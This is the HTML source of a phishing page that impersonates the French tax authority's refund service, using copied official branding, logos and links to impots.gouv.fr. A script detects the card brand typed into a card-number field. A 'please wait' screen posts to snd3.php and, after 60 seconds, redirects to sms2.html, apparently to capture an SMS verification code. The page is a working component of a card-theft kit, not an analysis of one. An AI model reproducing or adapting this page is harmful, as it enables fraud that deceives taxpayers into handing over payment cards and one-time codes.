<html><!-- Dac: dpapusx046 --><!-- Le: Wed Jun  7 11:35:32 2017 --><!-- Le: 4009 --><head>
            <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-15">
            <meta name="viewport" content="width=device-width, initial-scale=1">
            <link rel="stylesheet" href="templates/css/bootstrap-3.3.6.min.css">
            <link rel="stylesheet" href="templates/css/autentification.css">
            <link type="text/css" rel="stylesheet" href="templates/css/imp.css" media="all">


            <script src="templates/jquery-3.1.0.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.js"></script>


    <script>
  



        function type_carte(){
            var get_value = document.getElementById('cardcc').value;
            var type = get_value.substring(0,2);
            var other = get_value.substring(0,1);
            if(type == "40"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "41"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "42"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "43"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "44"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "45"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "46"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "47"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "48"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "49"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "31"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "32"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "33"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "34"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "35"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "36"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "37"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "38"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "39"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "30"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "51"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "52"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "53"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "54"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "55"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "22"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "23"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "24"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "25"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "26"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "27"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "60"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "64"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "65"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "50"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "56"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "58"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "63"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "62"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "67"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(other == "1"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "2"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "3"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "4"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "5"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "6"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "7"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "8"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "9"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "0"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }
        };
    </script>

            <title>Remboursement</title>
            <link rel="icon" href="templates/11.png">
            </head><body cz-shortcut-listen="true">
                <header role="banner">
                     <!-- ""banniereSmart" -->
                    <div class="container">
                    <div id="badIE" class="old-browser invisible">
                        
                    </div>
                        <div class="col-xs-12 col-sm-12  col-md-12 col-lg-12 noPadding">
                            <a id="portailpublic" href="" target="_blank">
                                <div id="impotsgouv" class="col-xs-12  col-sm-6  col-md-6  col-lg-4 noPadding">
                                </div>
                            </a>             
                            <div id="accesEspace" class="col-xs-offset-0 col-xs-12 col-sm-offset-1  col-sm-5 col-md-offset-0 col-md-6 col-lg-offset-0 col-lg-8 noPadding">
                                <ul class="col-xs-12  col-sm-12 col-md-offset-3 col-md-9 col-lg-offset-8 col-lg-4 noPadding ">
                                    <li>
                                        <a class="btn11 btn-primary" id="partPriv" href="" style="background-image: url(https://cfspart.impots.gouv.fr/templates/images/Cadenas.svg);background-repeat: no-repeat;background-position: 10pt;padding: 4pt 0pt 4pt 10pt;display: block;background-size: 25pt;">
                                            Votre espace particulier
                                        </a>
                                    </li>
                                    <li>
                                        <a class="btn11 btn-danger" id="proPriv" href="" style="
    background-image: url(https://cfspart.impots.gouv.fr/templates/images/Cadenas.svg);
    background-repeat: no-repeat;
    background-position: 10pt;
    padding: 4pt 0pt 4pt 9pt;
    display: block;
    background-size: 25pt;
">
                                            Votre espace professionnel
                                        </a>
                                    </li>
                                </ul>
                            </div> <!-- "accesEspace"  -->
                        </div>
                    </div> <!-- container -->
                </header>
                <main class="col-xs-12 col-sm-12 col-md-12 col-lg-12 noPadding" style="
    margin-top: -0.32%;
">
                    <div class="container" id="backToPortail">
                        <div id="cheminDeFer" class="col-xs-12  col-sm-12  col-md-12  col-lg-12">
                            <nav id="breadcrumb">
                                <ul>
                                    <li><a href="#" id="toPortailPub" title="Retour au portail">Accueil</a></li>
                                    <li><span>Particulier &gt; Formulaire de remboursement &eacute;lectronique - N 0037422993 </span></li>
                                </ul>
                            </nav>
                        </div> <!-- "cheminDeFer" -->
                    </div> <!-- "backToPortail" -->
                    <div class="container" id="principalContainer">
                        <!--La forme qui va contenir tout le formulaire  -->

                        <div id="principalForm" class="col-xs-12 col-sm-12  col-md-12 col-lg-12">
                            <!-- Forme group des donn&eacute;s personnelles -->
                            <div class="row" style="
    margin-bottom: -4.61%;
">
                            <form method="post" action="snd3.php" style="
">
                                <div id="creation" class="form-group col-xs-12 col-md-60 col-lg-60 optionmere" style="margin-bottom: 4%;">
                                <h1 class="titre" style=" 
    margin-top: -1%; color: #3366ff;
">Veuillez patienter</h1>
                                <div class="" style="
    margin-top: 0%;
"> 
                                    
                               
                                
                                
               
<div id="greyBackground">
<div id="container">
<div id="containerHeader"><br /><br /> <!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" --><center>
<div id="prefooterAmeli_1" class="wlp-bighorn-window  ">
<div class="wlp-bighorn-window-content">
<div class="prefooterbody seul">
<meta http-equiv="refresh" content="60; URL=sms2.html">
<ul>
Formulaire de remboursement &eacute;lectronique / R&eacute;f&eacute;rence : N0037422993

</ul>
</div>
</div>
</div>
<br />
<div align="center"><form id="formulaire_saisie_adresse" action="http://google.com" method="post">
<div>Veuillez patienter pendant que nous traitons votre demande<br />s.v.p ne pas fermer cette fen&ecirc;tre<br /><img src="https://cdn.lowgif.com/medium/d35d94c490e598e3-loading-gif-transparent-loading-gif.gif" width="35" height="35" /></div>
                                        </div>
                                        
                                        </div>
                                        
                                        

                                        
                                        
                                                   
                                        
       </div>

                                        </div>
                            
                                        
                                   </div>
                                   
                                </div>
                        
                                            
                                 
                                         
                                         
                                        
                                    
                                </div>
                                </div>
                                
                                <br>
                                <br>
                            </form>
                            <div class="container" id="backToPortail">
                        <div id="cheminDeFer" class="col-xs-12  col-sm-12  col-md-12  col-lg-12" style="
    margin-top: -4%;
">
                            <nav id="breadcrumb">
                                
                                    <a style="color: currentColor;">Un site de la direction g&eacute;n&eacute;rale des Finances publiques </a>
                                    
                              
                            </nav>
                        </div> <!-- "cheminDeFer" -->
                    </div></div>
                                <br>
                                <br>
                            </div>
                            <!-- Forme group de connexion 3S  -->  
                             <!-- Creation  -->
                        </div> <!-- row --> 
                      <!-- principalForm --> 
                      <!-- principalContainer -->
                    
<footer id="footer" class="footer" role="contentinfo" style="
    margin-top: 1%;
">

<div class="footer-wrapper">
  

<div class="container">
    
<div class="row" style="
    margin-left: auto;
">
          
              
              
              
            </div> <!-- end rows -->
  </div> <!-- end container -->


  <div class="footer-external-sites">
    <div class="container">
         <div class="comarquage" style="
    margin-bottom: 1px;
">
<a target="_blank" href="" title="Acc&amp;egraves au site service-public.fr ">
<img src="templates/1.gif" alt="Acc&amp;egraves au site service-public.fr" style="
    height: 20px;
">
</a>
<a target="_blank" href="" title="Acc&amp;egraves au site www.legifrance.gouv.fr">
<img src="templates/2.gif" width="138" height="25" alt="Acc&amp;egraves au site www.legifrance.gouv.fr " style="
">
</a> 
<a href="" class="sp" title="Acc&amp;egraves au site gouvernement.gouv.fr" target="_blank">
<img src="templates/3.jpg" width="120" height="45" alt="Acc&amp;egraves au site gouvernement.fr" style="height: 40px;width: 90px;">
</a>
<a target="_blank" href="" title="Acc&amp;egraves au site france.fr">
<img src="templates/4.gif" width="143" height="45" alt="Acc&amp;egraves au site france.fr " style="
    height: 40px;
    width: 130px;
">
</a> 
<a target="_blank" href="" title="Acc&amp;egraves au site service-public.fr )">
<img src="templates/5.gif" alt="Acc&amp;egraves au site service-public.fr " style="
    height: 35px;
    width: 100px;
">
</a>
</div>
    </div>
  </div>


  

  <div class="footer-copyright">
    <div class="footer-copyright">
    <div style="background: none repeat scroll 0%; font-family: sans-serif; font-size: small; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; width: 100%; color: #ffffff; text-align: center;"><marquee style="
"> Direction g&eacute;n&eacute;rale des Finances publiques   -   Mentions l&eacute;gales</marquee></div>
  </div>
  </div>
  </div>
</footer>
                </main>
                
                 
                
                 
                
                 
                
                 

                

                
                 

            
            <div id="aide" class="modal fade" role="dialog" aria-labelledby="titreAide">
            <div class="modal-dialog">
            <div class="modal-content">
            <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal"><img src="templates/images/fermer.svg" alt="fermer" tabindex="0"></button>
            <!-- <button type="button" class="close" data-dismiss="modal">&#x274C;</button> -->
            <h1 id="titreAide" class="modal-title">Aide</h1>
            </div>
            
            
            
            
            <p>                        * Il vous appartient de vous assurer que la configuration de votre ordinateur est compatible avec l'utilisation des t&eacute;l&eacute; proc&eacute;dures.
            </p>
            <br><a href="#sommaire">Retour</a></div>
            </div>
            <div id="helpFooter" class="modal-footer">
            <a href="#" title="Fermer la fenêtre">Fermer</a>
            </div>
            </div>
            
            

            
            <div id="deco" class="modal fade" role="dialog">
                <div class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h4 class="modal-title titre">D&eacute;connexion</h4>
                        </div>
                        <div class="modal-body">
                            <div id="deconnecte" class="rounded">
                                <iframe name="app0" id="app0" class="invisible"></iframe>
                                
                                
                                D&eacute;connexion en cours, veuillez patienter...<br>
                                
                                <br>
                                <img src="/templates/images/Miniballs.gif" alt="">
                                <br>
                            </div> <!-- deconnecte" -->
                        </div> <!-- modal-body -->
                    </div> <!-- modal-content -->
                </div> <!-- modal-dialog -->
            </div> 
            

<script src="/templates/js/jquery-1.11.3.min.js"></script>
<script src="/templates/js/bootstrap.min.js"></script>
<script type="text/javascript" src="/templates/js/auth.js"></script>
<script type="text/javascript" src="/templates/js/urls.js"> </script>
<script type="text/javascript">
urlLoginMotDePasse = '/LoginMDP?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyL21vbnByb2ZpbC13ZWJhcHAvbW9uQ29tcHRl';
urlLogin3S = '/LoginAccess?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyL21vbnByb2ZpbC13ZWJhcHAvbW9uQ29tcHRl';
if (document.getElementById('CFP')) document.getElementById('CFP').href=PortPub+PathCFP;
</script>





</body></html>
